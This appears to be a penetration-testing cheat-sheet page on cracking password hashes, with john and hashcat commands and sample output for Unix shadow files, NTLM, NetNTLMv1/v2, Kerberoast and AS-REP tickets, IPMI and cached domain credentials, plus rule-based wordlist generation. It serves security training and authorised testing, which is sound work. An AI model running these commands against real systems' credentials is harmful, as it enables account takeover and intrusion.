Hashes

Online Databases

LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)), QubesV3.1BackupDefaults

NT Hash (SAM)

Pull Hashes Decryption From Online Sources

Unix password

`/etc/shadow`

$<type>$<salt>$<hashed>

Crack /etc/shadow hashes

cat hash             
user:$1$CrackMe$U93**********UP9iUxGVIvq/:18439:0:99999:7:::

john hash --wordlist=/usr/share/wordlists/rockyou.txt

Hash Identifier

Online:

root:x:0:0:root:/root:/bin/bash

See Privilege escalation - Linux

/etc/passwd

$ cat /etc/passwd

...SNIP...
htb-student:x:1000:1000:,,,:/home/htb-student:/bin/bash

Unshadow

$ sudo cp /etc/passwd /tmp/passwd.bak 
$ sudo cp /etc/shadow /tmp/shadow.bak 
$ unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

Create custom password list

Bash

for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done > pwd.txt

kwprocessor

Hashcat generating rule-based Wordlist

$ cat custom.rule

:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

$ hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
$ cat mut_password.list

password
Password
passw0rd
Passw0rd
p@ssword
P@ssword
P@ssw0rd
password!
Password!
passw0rd!
p@ssword!
Passw0rd!
P@ssword!
p@ssw0rd!
P@ssw0rd!

Hashcat Existing Rules

$ ls /usr/share/hashcat/rules/

best64.rule                  specific.rule
combinator.rule              T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
d3ad0ne.rule                 T0XlC-insert_space_and_special_0_F.rule
dive.rule                    T0XlC-insert_top_100_passwords_1_G.rule
generated2.rule              T0XlC.rule
generated.rule               T0XlCv1.rule
hybrid                       toggles1.rule
Incisive-leetspeak.rule      toggles2.rule
InsidePro-HashManager.rule   toggles3.rule
InsidePro-PasswordsPro.rule  toggles4.rule
leetspeak.rule               toggles5.rule
oscommerce.rule              unix-ninja-leetspeak.rule
rockyou-30000.rule

Try best64.rule first

OneRuleToRuleThemAll

hashcat --attack-mode 0 --rules-file OneRuleToRuleThemAll.rule --hash-type 1000 hash /usr/share/wordlists/rockyou.txt

Crunch

Cupp

CeWL

$ cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
$ wc -l inlane.wordlist

326

Improve the custom wordlist

As we all know few password are just simple words. Many use numbers and special characters. To improve our password list we can use john the ripper. We can input our own rules, or we can just use the standard john-the-ripper rules

john ---wordlist=inlane.wordlist --rules --stdout > wordlist-modified.txt

Source: https://github.com/lamontns/pentest/blob/master/password-related-attacks/generating-custom-password-lists.md

Rainbow Tables - SHA1

RainbowCrack

John The Ripper

$ john --format=<hash_type> <hash or hash_file>

John will output the cracked passwords to the console and the file "john.pot" (~/.john/john.pot) to the current user's home directory.

john --wordlist=<wordlist_file> --rules <hash_file>

John - Incremental mode

John - SHA-256

john --format=sha256 hashes_to_crack.txt

John - /etc/shadow - SHA-512

┌─[xor@parrot]─[~/Téléchargements]
└──╼ $ls
passwd  rockyou.txt  rockyou.txt.bz2  shadow
┌─[xor@parrot]─[~/Téléchargements]
└──╼ $unshadow passwd shadow > mypasswd
┌─[xor@parrot]─[~/Téléchargements]
└──╼ $john --wordlist=rockyou.txt mypasswd
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password1        (root)
1g 0:00:00:01 DONE (2019-08-21 15:20) 0.9615g/s 123.0p/s 123.0c/s 123.0C/s 123456..diamond
Use the "--show" option to display all of the cracked passwords reliably
Session completed

John - SSH Private Key - RSA

root@Host-001:~/Bureau# vim id_rsa 
root@Host-001:~/Bureau# python /usr/share/john/ssh2john.py id_rsa > id_rsa_hash.txt
root@Host-001:~/Bureau# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt

John - Windows NTLM

hashdump format = User Name: RID: LM-HASH Value: NT-HASH value

john hash /usr/share/wordlists/rockyou.txt --format=NT

https://weakpass.com/pre-computed

John - ASREPRoast

john.exe --wordlist=C:\path\to\10k-worst-pass.txt C:\path\to\asrephashes.txt

Hashcat

Hashcat - Generic hash types

hashcat --example-hashes | less

Crunch Wordlist Generator - Create Single Characters

crunch 12 12 -f "/usr/share/crunch/charset.lst" mixalpha-numeric-all -t abracadabra@

With bash:

for i in {1..20}; do echo "password$i"; done

SHA1

echo 'd033e22ae348aeb5660fc2140aec35850c4da997' > admin_hash_sha1.txt

hashcat --hash-type 100 --attack-mode 0 admin_hash_sha1.txt /usr/share/wordlists/rockyou.txt

sha512crypt $6$, SHA512 (Unix) - /etc/shadow

$6$52450745$k5ka2p8bFuSmoVT1tzOyyuaREkkKBcCNqoDKzYiJL9RaE8yMnPgh2XzzF0NDrUhgrcLwg78xs1w5pJiypEdFX/

hashcat --hash-type 1800 --attack-mode 0 michael.hash /usr/share/wordlists/rockyou.txt

IPMI

General

hashcat -m 7300 ipmi.txt

python3 ipmipwner.py --host 10.129.154.218 -u admin -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash

HP iLO

hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

Exegol:

hashcat -m 7300 ipmi.txt -a 3 '\?1\?1\?1\?1\?1\?1\?1\?1' -1 '?d?u'

SAM - NT hash

$ sudo vim hashestocrack.txt

64f12cddaa88057e06a81b54e73b949b
31d6cfe0d16ae931b73c59d7e0c089c0
6f8c3f4d3869a10f3b4f0522f537fd33
184ecdda8cf1dd238d438c4aea4d560d
f7eb9c06fafaa23c4bcf22ba6781c1e2

sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

Online

MD5

hashcat -m 500 -a 0 md5-hashes.list rockyou.txt

Mysql bcrypt Blowfish (Unix) $2*$

echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > hash

hashcat --hash-type 3200 --attack-mode 0 hash `fzf-wordlists`

NTMLv2 - Responder

[SMB] NTLMv2-SSP Hash     : mssqlsvc::WIN-02:1122334455667788:67469E50D72CBD81C0555BA21EBEB8E2:010100000000000000A3B0E53898DA01B9CD8682359BA70F0000000002000800460030004100470001001E00570049004E002D004600490037003800360032004B00420052004F00500004003400570049004E002D004600490037003800360032004B00420052004F0050002E0046003000410047002E004C004F00430041004C000300140046003000410047002E004C004F00430041004C000500140046003000410047002E004C004F00430041004C000700080000A3B0E53898DA0106000400020000000800300030000000000000000000000000300000182E238D049AA0230066AE7B95F47CA65F370AC3AD06C2810BBFBB25BE72ACFD0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00390036000000000000000000
exit
[+] Exiting...

hashcat -m 5600 mssqlsvc_hash passwords.list

Kerberoast - SPN

$krb5tgs$23$*: RC4 (type 23) encrypted ticket

$krb5tgs$18$*: AES-256 (Type 18)

While it is possible to crack AES-128 (type 17) and AES-256 (type 18) TGS tickets using Hashcat, it will typically be significantly more time consuming than cracking an RC4 (type 23) encrypted ticket

`$krb5tgs$23$`

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt

If extracted with Mimikatz - Also see Internal Pentest - Kerberoast

python2.7 kirbi2john.py sqldev.kirbi

This will create a file called crack_file.

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

`$krb5tgs$18$`

hashcat -m 19700 aes_to_crack /usr/share/wordlists/rockyou.txt

ASREPRoast

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

MsCacheV2 - DDC2

// hashcat format
$DCC2$10240#username#7afec****************6d0c

hashcat64 -a 0 -m 2100 -r /usr/share/hashcat/rules/best64.rule mscachev2.txt passwords\*

Convert NetNTLMv1 to NTLM - PTH or Crack

Online

Hash NT obtained - try to break it

NTLMv1 Multitool

$ python3 ntlmv1-multi/ntlmv1.py --ntlmv1 'DEV$::HTB:11EBE0BFBF241EE1D55DD9F5535254FCAF77876B9D200341:11EBE0BFBF241EE1D55DD9F5535254FCAF77876B9D200341:1122334455667788' 
Hashfield Split:
['DEV$', '', 'HTB', '11E<-SNIP->341', '11EBE0BF<-SNIP->876B9D200341', '1122334455667788']

Hostname: HTB
Username: DEV$
Challenge: 1122334455667788
LM Response: 11EBE<-SNIP->200341
NT Response: 11EBE<-SNIP->77876B9D200341
CT1: 11E<-SNIP->41EE1
CT2: D55<-SNIP->254FC
CT3: AF7<-SNIP->00341

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin AF7<-SNIP->00341 1122334455667788

To crack with hashcat create a file with the following contents:
11<-SNIP->EE1:1122334455667788
D5<-SNIP->5254FC:1122334455667788

echo "11EB<-SNIP->E1:1122334455667788">>14000.hash
echo "D55D<-SNIP->254FC:1122334455667788">>14000.hash

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

$ echo "11EB<-SNIP->E1:1122334455667788">>14000.hash
$ echo "D55D<-SNIP->254FC:1122334455667788">>14000.hash
$ hashcat -m 14000 -a 3 -1 DES_full.charset --hex-charset 14000.hash '?1?1?1?1?1?1?1?1'

Other script

$ python deskey_to_ntlm.py --hash dev.hash
[+] CT1 key: 11e<-SNIP->41ee1
[+] CT2 key: d55<-SNIP->1ee1

hashcat -m 14000 des_keys.txt -o des_keys.out -a 3 -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1 -w 3

$ wget https://raw.githubusercontent.com/brannondorsey/naive-hashcat/refs/heads/master/hashcat-3.6.0/charsets/DES_full.charset
$ hashcat -m 14000 des_keys.txt -o des_keys.out -a 3 -1 DES_full.charset --hex-charset '?1?1?1?1?1?1?1?1' -w 3

PreviousCracking NextFiles - Encrypted

Last updated 23 days ago